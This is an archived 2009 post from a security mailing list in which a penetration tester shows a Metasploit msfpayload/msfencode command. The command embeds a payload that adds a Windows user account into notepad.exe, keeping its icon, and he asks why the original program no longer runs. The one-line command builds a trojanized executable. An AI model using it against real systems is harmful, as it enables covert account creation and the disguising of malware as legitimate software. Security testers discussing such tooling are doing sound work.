PaulDotCom mailing list archives
Manually embedding shellcode into executables
From: irongeek at irongeek.com (Adrian Crenshaw)
Date: Tue, 1 Dec 2009 17:17:23 -0500
Ok, I just read Rob post here: http://www.room362.com/blog/2009/11/3/metasploit-blends-in-new-msfpayloadencode.html and checked my exes. Since both are the same size, I'm guessing it's not working as a binder but as a "cloaker" of sorts. Adrian On Tue, Dec 1, 2009 at 5:12 PM, Adrian Crenshaw <irongeek at irongeek.com>wrote:
Ok, I did this: $ msfpayload windows/adduser user=test pass=test exitfunc=seh R | msfencode -t exe -x notepad.exe -o MYNEWFILE.exe The exe made has the same icon an metadata as the original. The payload runs since the "test" account is created, but notepad never comes up, so it doen not make much of a binder. Any ideas? Adrian
-------------- next part -------------- An HTML attachment was scrubbed... URL: http://mail.pauldotcom.com/pipermail/pauldotcom/attachments/20091201/b120731c/attachment.htm
Current thread:
- Manually embedding shellcode into executables Matthew Raspberry (Dec 01)
- Manually embedding shellcode into executables Dimitrios Kapsalis (Dec 01)
- Manually embedding shellcode into executables Adrian Crenshaw (Dec 01)
- Manually embedding shellcode into executables Rob Fuller (Dec 01)
- Manually embedding shellcode into executables Adrian Crenshaw (Dec 01)
- Manually embedding shellcode into executables Adrian Crenshaw (Dec 01)
- Manually embedding shellcode into executables Rob Fuller (Dec 01)
- Manually embedding shellcode into executables Adrian Crenshaw (Dec 01)
- Manually embedding shellcode into executables Dimitrios Kapsalis (Dec 01)
- Manually embedding shellcode into executables Dimitrios Kapsalis (Dec 01)
- <Possible follow-ups>
- Manually embedding shellcode into executables Matthew Raspberry (Dec 02)
- Manually embedding shellcode into executables Robert Portvliet (Dec 30)